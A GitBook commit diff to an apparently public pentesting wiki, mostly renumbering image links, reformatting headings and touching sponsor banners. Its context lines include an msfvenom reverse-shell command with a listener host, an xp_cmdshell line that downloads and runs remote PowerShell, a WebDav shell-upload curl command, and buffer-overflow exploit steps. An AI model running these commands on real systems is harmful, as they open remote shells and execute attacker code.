GitBook: [#3449] No subject

backdoors/salseo.md

@@ -30,7 +30,7 @@ You can **select the architecture** inside Visual Studio in the **left "Build" T
 
 Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable):
 
-![](<../.gitbook/assets/image (1) (2) (1).png>)
+![](<../.gitbook/assets/image (1) (2) (1) (1).png>)
 
 ## Prepare the Backdoor
 
@@ -131,7 +131,7 @@ Then, go to your **SalseoLoader folder** and **execute DllExport\_Configure.bat*
 
 Select **x64** (if you are going to use it inside a x64 box, that was my case), select **System.Runtime.InteropServices** (inside **Namespace for DllExport**) and press **Apply**
 
-![](<../.gitbook/assets/image (7) (1).png>)
+![](<../.gitbook/assets/image (7) (1) (1).png>)
 
 ### **Open the project again with visual Studio**
 
@@ -147,7 +147,7 @@ Select **Output Type = Class Library** (Project --> SalseoLoader Properties -->
 
 Select **x64** **platform** (Project --> SalseoLoader Properties --> Build --> Platform target = x64)
 
-![](<../.gitbook/assets/image (9) (1).png>)
+![](<../.gitbook/assets/image (9) (1) (1).png>)
 
 To **build** the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear)
 

c2/cobalt-strike.md

@@ -56,7 +56,7 @@ portscan [targets] [ports] [arp|icmp|none] [max connections]
 # Powershell
 # Import Powershell module
 powershell-import C:\path\to\PowerView.ps1
-powershell just write powershell cmd here
+powershell <just write powershell cmd here>
 
 # User impersonation
 ## Token generation with creds

exploiting/windows-exploiting-basic-guide-oscp-lvl.md

@@ -1,4 +1,4 @@
-
+# Windows Exploiting (Basic Guide - OSCP lvl)
 
 <details>
 
@@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 </details>
 
+## **Start installing the SLMail service**
 
-# **Start installing the SLMail service**
-
-# Restart SLMail service
+## Restart SLMail service
 
 Every time you need to **restart the service SLMail** you can do it using the windows console:
 
@@ -29,7 +28,7 @@ net start slmail
 
 ![](<../.gitbook/assets/image (23).png>)
 
-# Very basic python exploit template
+## Very basic python exploit template
 
 ```python
 #!/usr/bin/python
@@ -53,25 +52,25 @@ except:
     print "Could not connect to "+ip+":"+port
 ```
 
-# **Change Immunity Debugger Font**
+## **Change Immunity Debugger Font**
 
 Go to `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
 
-# **Attach the proces to Immunity Debugger:**
+## **Attach the proces to Immunity Debugger:**
 
 **File --> Attach**
 
-![](<../.gitbook/assets/image (24).png>)
+![](<../.gitbook/assets/image (24) (1).png>)
 
 **And press START button**
 
-# **Send the exploit and check if EIP is affected:**
+## **Send the exploit and check if EIP is affected:**
 
 ![](<../.gitbook/assets/image (25).png>)
 
 Every time you break the service you should restart it as is indicated in the beginnig of this page.
 
-# Create a pattern to modify the EIP
+## Create a pattern to modify the EIP
 
 The pattern should be as big as the buffer you used to broke the service previously.
 
@@ -111,7 +110,7 @@ With this buffer the EIP crashed should point to 42424242 ("BBBB")
 
 Looks like it is working.
 
-# Check for Shellcode space inside the stack
+## Check for Shellcode space inside the stack
 
 600B should be enough for any powerfull shellcode.
 
@@ -131,7 +130,7 @@ You can see that when the vulnerability is reached, the EBP is pointing to the s
 
 In this case we have **from 0x0209A128 to 0x0209A2D6 = 430B.** Enough.
 
-# Check for bad chars
+## Check for bad chars
 
 Change again the buffer:
 
@@ -171,7 +170,7 @@ In this case you can see that **the char 0x0D is avoided**:
 
 ![](<../.gitbook/assets/image (34).png>)
 
-# Find a JMP ESP as a return address
+## Find a JMP ESP as a return address
 
 Using:
 
@@ -200,9 +199,9 @@ Now, inside this memory you should find some JMP ESP bytes, to do that execute:
 
 ![](<../.gitbook/assets/image (36).png>)
 
-**In this case, for example: **_**0x5f4a358f**_
+**In this case, for example: \_0x5f4a358f**\_
 
-# Create shellcode
+## Create shellcode
 
 ```
 msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d'
@@ -266,7 +265,7 @@ except:
 There are shellcodes that will **overwrite themselves**, therefore it's important to always add some NOPs before the shellcode
 {% endhint %}
 
-# Improving the shellcode
+## Improving the shellcode
 
 Add this parameters:
 
@@ -274,7 +273,6 @@ Add this parameters:
 EXITFUNC=thread -e x86/shikata_ga_nai
 ```
 
-
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
@@ -290,5 +288,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 
 </details>
-
-

forensics/basic-forensic-methodology/linux-forensics.md

@@ -1,7 +1,7 @@
 # Linux Forensics
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -168,7 +168,7 @@ ThisisTheMasterSecret
 ```
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -233,7 +233,7 @@ find /sbin/ –exec rpm -qf {} \; | grep "is not"
 ```
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -376,7 +376,7 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
 More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -466,7 +466,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md

@@ -164,7 +164,7 @@ If it was a **GPT table instead of a MBR** it should appear the signature _EFI P
 
 The **FAT (File Allocation Table)** file system is named for its method of organization, the file allocation table, which resides at the beginning of the volume. To protect the volume, **two copies** of the table are kept, in case one becomes damaged. In addition, the file allocation tables and the root folder must be stored in a **fixed location** so that the files needed to start the system can be correctly located.
 
-![](<../../../.gitbook/assets/image (495) (1).png>)
+![](<../../../.gitbook/assets/image (495).png>)
 
 The minimum space unit used by this file-system is a **cluster, typically 512B** (which is composed by a number of sectors).
 

forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md

@@ -158,7 +158,7 @@ Some interesting attributes:
 
 ### NTFS timestamps
 
-![](<../../../.gitbook/assets/image (512) (1).png>)
+![](<../../../.gitbook/assets/image (512).png>)
 
 Another useful tool to analyze the MFT is [**MFT2csv**](https://github.com/jschicht/Mft2Csv) (select the mft file or the image and press dump all and extract to extract al the objects).\
 This program will extract all the MFT data and present it in CSV format. It can also be used to dump the files.

forensics/basic-forensic-methodology/windows-forensics/README.md

@@ -46,7 +46,7 @@ When a file is deleted in this folder are created 2 files:
 * `$I{id}`: File information (date of when it was deleted}
 * `$R{id}`: Content of the file
 
-![](<../../../.gitbook/assets/image (486) (1).png>)
+![](<../../../.gitbook/assets/image (486).png>)
 
 Having these files you can sue the tool [**Rifiuti**](https://github.com/abelcheung/rifiuti2) to get the original address of the deleted files and the date it was deleted (use `rifiuti-vista.exe` for Vista – Win10).
 
@@ -140,7 +140,7 @@ It's possible to identify that a USB device was used thanks to the creation of:
 
 Note that some LNK file instead of pointing to the original path, points to the WPDNSE folder:
 
-![](<../../../.gitbook/assets/image (476) (1).png>)
+![](<../../../.gitbook/assets/image (476).png>)
 
 The files in the folder WPDNSE are a copy of the original ones, then won't survive a restart of the PC and the GUID is taken from a shellbag.
 

forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md

@@ -155,7 +155,7 @@ Within this registry it's possible to find:
 
 Moreover, checking the registry `HKLM\SYSTEM\ControlSet001\Enum\USB` and comparing the values of the sub-keys it's possible to find the VID value
 
-![](<../../../.gitbook/assets/image (478) (1).png>)
+![](<../../../.gitbook/assets/image (478).png>)
 
 With the previous information the registry `SOFTWARE\Microsoft\Windows Portable Devices\Devices` can be used to obtain the **`{GUID}`**:
 

generic-methodologies-and-resources/brute-force.md

@@ -1,7 +1,7 @@
 # Brute Force - CheatSheet
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -84,7 +84,7 @@ python3 cupp.py -h
 * [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm)
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -441,7 +441,7 @@ crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
 ```
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -641,7 +641,7 @@ crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
 ```
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -808,7 +808,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

generic-methodologies-and-resources/python/README.md

@@ -1,7 +1,7 @@
 # Python Sandbox Escape & Pyscript
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -51,7 +51,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md

@@ -1,7 +1,7 @@
 # Bypass Python sandboxes
 
 {% hint style="danger" %}
-![](<../../../.gitbook/assets/image (9) (3).png>)
+![](<../../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -322,7 +322,7 @@ with (a as b):
 ```
 
 {% hint style="danger" %}
-![](<../../../.gitbook/assets/image (9) (3).png>)
+![](<../../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -710,7 +710,7 @@ You can check the output of this script in this page:
 {% endcontent-ref %}
 
 {% hint style="danger" %}
-![](<../../../.gitbook/assets/image (9) (3).png>)
+![](<../../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -1118,7 +1118,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../../../.gitbook/assets/image (9) (3).png>)
+![](<../../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

generic-methodologies-and-resources/python/venv.md

@@ -1,7 +1,7 @@
 # venv
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -62,7 +62,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

generic-methodologies-and-resources/python/web-requests.md

@@ -1,7 +1,7 @@
 # Web Requests
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -142,7 +142,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

generic-methodologies-and-resources/search-exploits.md

@@ -1,7 +1,7 @@
 # Search Exploits
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -85,7 +85,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

linux-hardening/privilege-escalation/docker-breakout/README.md

@@ -1,7 +1,7 @@
 # Docker Basics & Breakout
 
 {% hint style="danger" %}
-![](<../../../.gitbook/assets/image (9) (3).png>)
+![](<../../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -124,7 +124,7 @@ tar -zcvf private_keys_backup.tar.gz ~/.docker/trust/private
 When I changed Docker host, I had to move the root keys and repository keys to operate from the new host.
 
 {% hint style="danger" %}
-![](<../../../.gitbook/assets/image (9) (3).png>)
+![](<../../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -254,7 +254,7 @@ docker run -it --security-opt=no-new-privileges:true nonewpriv
 For more **`--security-opt`** options check: [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration)
 
 {% hint style="danger" %}
-![](<../../../.gitbook/assets/image (9) (3).png>)
+![](<../../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -397,7 +397,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../../../.gitbook/assets/image (9) (3).png>)
+![](<../../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

linux-hardening/useful-linux-commands/README.md

@@ -1,7 +1,7 @@
 # Useful Linux Commands
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -148,7 +148,7 @@ sudo chattr -i file.txt #Remove the bit so you can delete it
 ```
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -327,7 +327,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

mobile-pentesting/android-app-pentesting/README.md

@@ -1,7 +1,7 @@
 # Android Applications Pentesting
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -63,7 +63,7 @@ adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
 ```
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -246,7 +246,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains
 {% endcontent-ref %}
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -496,7 +496,7 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b
 * [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags)
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -705,7 +705,7 @@ It is able to:
 Useful to detect malware: [https://koodous.com/](https://koodous.com)
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -802,7 +802,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

mobile-pentesting/android-checklist.md

@@ -1,7 +1,7 @@
 # Android APK Checklist
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -97,7 +97,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

network-services-pentesting/113-pentesting-ident.md

@@ -33,11 +33,11 @@ PORT    STATE SERVICE
 
 If a machine is running the service ident and samba (445) and you are connected to samba using the port 43218. You can get which user is running the samba service by doing:
 
-![](<../.gitbook/assets/image (15).png>)
+![](<../.gitbook/assets/image (15) (1).png>)
 
 If you just press enter when you conenct to the service:
 
-![](<../.gitbook/assets/image (16).png>)
+![](<../.gitbook/assets/image (16) (1).png>)
 
 Other errors:
 

network-services-pentesting/8086-pentesting-influxdb.md

@@ -1,7 +1,7 @@
 # 8086 - Pentesting InfluxDB
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -164,7 +164,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

network-services-pentesting/pentesting-mssql-microsoft-sql-server.md

@@ -207,7 +207,7 @@ SQL> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http:/
 sqsh -S <IP> -U <Username> -P <Password> -D <Database>
 ```
 
-![](<../.gitbook/assets/image (20).png>)
+![](<../.gitbook/assets/image (20) (1).png>)
 
 ## Manual
 

network-services-pentesting/pentesting-postgresql.md

@@ -1,7 +1,7 @@
 # 5432,5433 - Pentesting Postgresql
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -99,7 +99,7 @@ ORDER BY 1;
 ```
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -179,7 +179,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

network-services-pentesting/pentesting-web/put-method-webdav.md

@@ -1,7 +1,7 @@
 # WebDav
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -73,7 +73,7 @@ curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
 ```
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -88,7 +88,7 @@ This vulnerability is very interesting. The **WebDav** does **not allow** to **u
 
 Then you can **upload** your shell as a ".**txt" file** and **copy/move it to a ".asp;.txt"** file. An accessing that file through the web server, it will be **executed** (cadaver will said that the move action didn't work, but it did).
 
-![](<../../.gitbook/assets/image (18).png>)
+![](<../../.gitbook/assets/image (18) (1).png>)
 
 ## Post credentials
 
@@ -145,7 +145,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../../.gitbook/assets/image (9) (3).png>)
+![](<../../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

network-services-pentesting/pentesting-web/wordpress.md

@@ -310,7 +310,7 @@ Appearance → Editor → 404 Template (at the right)
 
 Change the content for a php shell:
 
-![](<../../.gitbook/assets/image (21).png>)
+![](<../../.gitbook/assets/image (21) (1).png>)
 
 Search in internet how can you access that updated page. In thi case you have to access here: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
 

pentesting-web/command-injection.md

@@ -1,7 +1,7 @@
 # Command Injection
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -101,7 +101,7 @@ Here are the top 25 parameters that could be vulnerable to code injection and si
 ```
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -187,7 +187,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

pentesting-web/email-injections.md

@@ -1,7 +1,7 @@
 # Email Injections
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -118,7 +118,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
 
 {% hint style="danger" %}
-![](<../.gitbook/assets/image (9) (3).png>)
+![](<../.gitbook/assets/image (9) (1).png>)
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\

pentesting-web/http-request-smuggling/browser-http-request-smuggling.md

@@ -83,7 +83,7 @@ I've set the fetch mode **'no-cors'** to ensure Chrome **displays the connection
 
 When you execute this, you should see **two requests** in the Network tab with the **same connection ID**, and the **second** one should trigger a **404**:
 
-![](<../../.gitbook/assets/image (158) (2).png>)
